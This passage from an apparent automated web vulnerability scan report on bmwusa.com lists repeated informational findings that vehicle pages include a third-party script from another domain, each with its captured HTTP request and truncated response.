User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:16 GMT;path=/
Content-Length: 214442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.157. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:04 GMT;path=/
Content-Length: 214443


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.158. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:49:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:28 GMT;path=/
Content-Length: 202171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.159. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:12 GMT;path=/
Content-Length: 214705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.160. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:51:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:04 GMT;path=/
Content-Length: 227207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.161. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:10:42 GMT;path=/
Content-Length: 227208


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.162. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:49:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:01 GMT;path=/
Content-Length: 215752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.163. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:25 GMT;path=/
Content-Length: 215753


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.164. http://www.bmwusa.com/standard/content/vehicles/2011/5/5explore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/5explore.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/5explore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:39 GMT;path=/
Content-Length: 180004


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</div><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.165. http://www.bmwusa.com/standard/content/vehicles/2011/5/5granturismoexplore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/5granturismoexplore.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/5granturismoexplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:51:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:42 GMT;path=/
Content-Length: 180239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.166. http://www.bmwusa.com/standard/content/vehicles/2011/5/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:31 GMT;path=/
Content-Length: 202396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.167. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:36 GMT;path=/
Content-Length: 202156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.168. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:09:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:36 GMT;path=/
Content-Length: 212832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.169. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740isedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:24 GMT;path=/
Content-Length: 212833


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.170. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
